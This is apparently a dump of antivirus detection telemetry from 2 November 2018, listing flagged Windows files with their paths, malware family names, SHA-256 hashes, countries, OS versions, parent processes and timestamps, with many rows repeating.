  Row(detection=Row(filename='avscan-20181102-194907-54f662e4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6b332e29\\AVSCAN-20181102-194643-3B51EB47\\AVSCAN-20181102-194907-54F662E4', filesize=960000, name='TR/Crypt.XPACK.Gen2.#M1.#R1'), hash='5a436798dbe7503e99e0db771b57e5f33da119ee6b3f5ebe8d3f37aa3c8e7ec5', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T18:49:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T02:40:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='devcon.exe', filepath='C:\\Program Files\\PowerISO\\devcon.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='3a57070a086808cc455ce916a5c542e0ee3ca531ca8a17086984c73b229c2865', metadata=Row(cmdline='--engine=2 --session-id=MqsowvCxDFT8Hl5aNKtWC5Fon8U3nyTOadLPz8Fk --registry-suffix=ESET --extended-safebrowsing-enabled --chrome-version=70.0.3538.77 --chrome-channel=4 --srt-field-trial-group-name=NewCleanerUIExperiment', country='MA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\35.178.200\\software_reporter_tool.exe', parentsize=12095608, timestamp='2018-11-02T14:53:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:16:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:01:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-134410-960a3f59', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_54044395\\AVSCAN-20181102-134122-7A9B72AE\\AVSCAN-20181102-134410-960A3F59', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:44:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-163102-bbdcec3a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_77a1b0a3\\AVSCAN-20181102-163042-B92CD8C8\\AVSCAN-20181102-163102-BBDCEC3A', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:31:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='30b74a05d543886bcf20296ccd1c030d2e825381d1249c594e291df91188c233', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\30B74A05D543886BCF20296CCD1C030D2E825381D1249C594E291DF91188C233', filesize=960000, name='ADWARE/iBryte.Gen7.#M300.#R600467'), hash='30b74a05d543886bcf20296ccd1c030d2e825381d1249c594e291df91188c233', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:52:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Program Files (x86)\\Intel\\Intel(R) Processor Graphics\\uninstall\\Setup.exe', filesize=1096000, name='W32/Jeefo.A.#M1.#R1'), hash='32b40409c157056050fd928b0ff73ffe9b91fc84f5c765b028d88b1a864b4b89', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-02T06:55:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='navnet_garmin_v359.exe', filepath='C:\\Users\\X\\AppData\\Roaming\\IDM\\DwnlData\\X230\\navnet_Garmin_v359_278\\navnet_Garmin_v359.exe', filesize=232000, name='HEUR/AGEN.1031614.#M1.#R1'), hash='0cdcb40b28416b55bd01d4cc98e457174bfa8fdde5f50bacbf3c60aa116b056b', metadata=Row(cmdline='-Embedding', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Internet Download Manager\\IDMan.exe', parentsize=3952696, timestamp='2018-11-02T00:44:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-112152-2e4ba9ce', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_997c82cc\\AVSCAN-20181102-112010-18AF2E51\\AVSCAN-20181102-112152-2E4BA9CE', filesize=576000, name='TR/Agent.2d9bff.#M1.#R1'), hash='2d9bffb5b2cd0a3d0251d753856f11d6b3fc6a26eedd17c9bbbefe52eafce55b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T10:21:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashupdate (1).exe', filepath='C:\\Users\\X\\Downloads\\flashupdate (1).exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='0d1593e54e93e09077e3ca8722f813d99da89241786fbc8a9bbce08446682b95', metadata=Row(cmdline='-Embedding 535EA46E8CD974E91585B26A595EA663 M Global\\\\\\\\MSI0000', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\SysWOW64\\msiexec.exe', parentsize=73216, timestamp='2018-11-02T06:07:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:51:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:52:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:24:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:20:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:36:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yamgeneric001.exe', filepath='\\\\?\\C:\\Windows\\yamgeneric001.exe', filesize=3840000, name='SPR/BitCoin.R.17.#M1.#R1'), hash='123ddc718d5557233de61371644f83948c59c12e897ff58dec883c64e22aaf3b', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T15:22:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:53:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='updater_zip_res2017042888uu_new[1].exe', filepath='\\\\?\\C:\\Windows\\SysWOW64\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\Updater_zip_res2017042888uu_new[1].exe', filesize=576000, name='HEUR/AGEN.1030714.#M1.#R1'), hash='2d9bffb5b2cd0a3d0251d753856f11d6b3fc6a26eedd17c9bbbefe52eafce55b', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:51:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:43:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:32:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:38:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Desktop\\cbr\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Desktop\\cbr\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T06:55:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:23:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:02:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-134251-89383726', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_54044395\\AVSCAN-20181102-133949-6B870B95\\AVSCAN-20181102-134251-89383726', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:42:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:37:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061350-6fd442e9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061350-6FD442E9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:13:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-101316-5209b0cf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_caa3c8ab\\AVSCAN-20181102-101244-4CA1107D\\AVSCAN-20181102-101316-5209B0CF', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:13:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053255-b852b7a8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053255-B852B7A8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:32:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061219-397672a6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061219-397672A6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:12:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='4badc1401f54853afb2ddb6af56587654b53373780a997941994a2641b4caf88', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\4BADC1401F54853AFB2DDB6AF56587654B53373780A997941994A2641B4CAF88', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='4badc1401f54853afb2ddb6af56587654b53373780a997941994a2641b4caf88', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T11:21:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051505-3aebee5b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051505-3AEBEE5B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:15:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060401-109a5b84', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060401-109A5B84', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:04:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Desktop\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='UY', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Desktop\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T02:24:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-132426-8464e404', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4ca86332\\AVSCAN-20181102-131118-1FB9A0FB\\AVSCAN-20181102-132426-8464E404', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:24:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-153824-fb719841', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-153824-FB719841', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:41:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup.exe', filepath='d:\\o cung di dong\\soft\\herosoft_2001xp_update_2802\\SETUP.EXE', filesize=256000, name='TR/Patched.Ren.Gen.#M300.#R2947'), hash='5c1510d37bd30ba99f8e42223d0f63bf4935c595fdfe9bf34469309bd1af3a17', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:37:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-210754-2f08ae6e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6e1eda2d\\AVSCAN-20181102-210709-2A194B81\\AVSCAN-20181102-210754-2F08AE6E', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T18:07:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061328-625df3fb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061328-625DF3FB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:13:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-133418-93ef9d91', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-133418-93EF9D91', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:37:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061336-6740ead2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061336-6740EAD2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:13:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='5b42f252e950426854469439afb4cf4128b6c6b45503a80f93a3063af77f0a6a', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_28.10.2018-3.categorizing\\5B42F252E950426854469439AFB4CF4128B6C6B45503A80F93A3063AF77F0A6A', filesize=2240000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='5b42f252e950426854469439afb4cf4128b6c6b45503a80f93a3063af77f0a6a', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 19.0.0\\avp.exe', parentsize=619640, timestamp='2018-11-02T14:41:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061219-39a3f964', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061219-39A3F964', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:12:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061246-4951eee1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061246-4951EEE1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:12:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061905-2b658b5d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061905-2B658B5D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:19:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061336-675c4b13', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061336-675C4B13', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:13:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181101-211220-ba621537', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_188be287\\AVSCAN-20181101-210746-846872E2\\AVSCAN-20181101-211220-BA621537', filesize=128000, name='PUA/Outbrowse.Gen.#M1.#R1'), hash='555ac4eaff7b8bcf964d627b5e4a497896a066eda5217c2ef82796731722f600', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T03:12:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pdf_contract agreement.tar --> j111.exe', filepath='pdf_CONTRACT AGREEMENT.tar --> J111.exe', filesize=1152000, name='DR/Delphi.6abe65.#M1.#R1'), hash='6abe6528568d3820b27e309c4369b24bf0f1dc41bf8c3774d9c2526104f6a5ff', metadata=Row(cmdline=None, country='DE', os_name='Linux', os_vmajor='3', os_vminor='14', parentproc=None, parentsize=None, timestamp='2018-11-02T06:55:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061020-f2d046a3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061020-F2D046A3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:10:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055529-df819575', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055529-DF819575', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060344-066e9e92', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060344-066E9E92', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:03:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060253-e864caa9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060253-E864CAA9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:02:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055003-1d246bee', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055003-1D246BEE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:02Z'), dt=datetime.date(2018, 11, 2)),
